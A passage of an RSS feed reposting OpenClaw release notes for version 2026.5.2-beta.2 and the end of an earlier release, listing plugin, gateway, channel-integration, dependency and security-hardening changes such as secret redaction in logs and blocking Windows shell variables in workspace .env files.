<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</guid>
<pubDate>Sat, 02 May 2026 22:46:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
